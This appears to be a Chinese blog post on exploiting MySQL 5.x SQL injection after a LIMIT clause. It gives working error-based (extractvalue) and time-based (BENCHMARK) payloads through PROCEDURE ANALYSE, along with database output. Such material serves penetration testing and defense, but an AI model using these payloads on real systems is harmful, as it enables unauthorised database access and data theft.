描寫(xiě)sql注入利用方法的文章數(shù)不勝數(shù)，本文將描述一種比較特殊的場(chǎng)景。

Mysql注入點(diǎn)在limit關(guān)鍵字后面的利用方法

細(xì)節(jié)

在一次測(cè)試中，我碰到了一個(gè)sql注入的問(wèn)題，在網(wǎng)上沒(méi)有搜到解決辦法，當(dāng)時(shí)的注入點(diǎn)是在limit關(guān)鍵字后面，數(shù)據(jù)庫(kù)是MySQL5.x,SQL語(yǔ)句類(lèi)似下面這樣：

SELECT field FROM table WHERE id > 0 ORDER BY id LIMIT 【注入點(diǎn)】

問(wèn)題的關(guān)鍵在于，語(yǔ)句中有order by 關(guān)鍵字，我們知道，mysql 中在order by 前面可以使用union 關(guān)鍵字，所以如果注入點(diǎn)前面沒(méi)有order by 關(guān)鍵字，就可以順利的使用union 關(guān)鍵字，但是現(xiàn)在的情況是，注入點(diǎn)前面有order by 關(guān)鍵字，這個(gè)問(wèn)題在stackoverflow 上和sla.ckers上都有討論，但是都沒(méi)有什么有效的解決辦法。

我們先看看 mysql 5.x 的文檔中的 select 的語(yǔ)法：

SELECT

[ALL | DISTINCT | DISTINCTROW ]

[HIGH_PRIORITY]

[STRAIGHT_JOIN]

[SQL_SMALL_RESULT] [SQL_BIG_RESULT] [SQL_BUFFER_RESULT]

[SQL_CACHE | SQL_NO_CACHE] [SQL_CALC_FOUND_ROWS]

select_expr [, select_expr ...]

[FROM table_references

[WHERE where_condition]

[GROUP BY {col_name | expr | position}

[ASC | DESC], ... [WITH ROLLUP]]

[HAVING where_condition]

[ORDER BY {col_name | expr | position}

[ASC | DESC], ...]

[LIMIT {[offset,] row_count | row_count OFFSET offset}]

[PROCEDURE procedure_name(argument_list)]

[INTO OUTFILE 'file_name' export_options

| INTO DUMPFILE 'file_name'

| INTO var_name [, var_name]]

[FOR UPDATE | LOCK IN SHARE MODE]]

limit 關(guān)鍵字后面還有 PROCEDURE 和 INTO 關(guān)鍵字，into 關(guān)鍵字可以用來(lái)寫(xiě)文件，但這在本文中不重要，這里的重點(diǎn)是 PROCEDURE 關(guān)鍵字.MySQL默認(rèn)可用的存儲(chǔ)過(guò)程只有 ANALYSE (doc)。

嘗試用這個(gè)存儲(chǔ)過(guò)程：

mysql> SELECT field FROM table where id > 0 ORDER BY id LIMIT 1,1 PROCEDURE ANALYSE(1);

ERROR 1386 (HY000): Can't use ORDER clause with this procedure

ANALYSE支持兩個(gè)參數(shù)，試試兩個(gè)參數(shù)：

mysql> SELECT field FROM table where id > 0 ORDER BY id LIMIT 1,1 PROCEDURE ANALYSE(1,1);

ERROR 1386 (HY000): Can't use ORDER clause with this procedure

依然無(wú)效，嘗試在 ANALYSE 中插入 sql 語(yǔ)句：

mysql> SELECT field from table where id > 0 order by id LIMIT 1,1 procedure analyse((select IF(MID(version(),1,1) LIKE 5, sleep(5),1)),1);

響應(yīng)如下：

ERROR 1108 (HY000): Incorrect parameters to procedure 'analyse’

事實(shí)證明，sleep 沒(méi)有被執(zhí)行，最終，我嘗試了如下payload ：

mysql> SELECT field FROM user WHERE id >0 ORDER BY id LIMIT 1,1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1);

ERROR 1105 (HY000): XPATH syntax error: ':5.5.41-0ubuntu0.14.04.1'

啊哈，上面的方法就是常見(jiàn)的報(bào)錯(cuò)注入，所以，如果注入點(diǎn)支持報(bào)錯(cuò)，那所有問(wèn)題都o(jì)k，但是如果注入點(diǎn)不是報(bào)錯(cuò)的，還可以使用 time-based 的注入，payload 如下：

SELECT field FROM table WHERE id > 0 ORDER BY id LIMIT 1,1 PROCEDURE analyse((select extractvalue(rand(),concat(0x3a,(IF(MID(version(),1,1) LIKE 5, BENCHMARK(5000000,SHA1(1)),1))))),1)

有意思的是，這里不能用sleep而只能用 BENCHMARK。

另外，這里還有一種類(lèi)似的方法 https://rdot.org/forum/showpost.php?p=36186&postcount=30

更多信息請(qǐng)查看IT技術(shù)專(zhuān)欄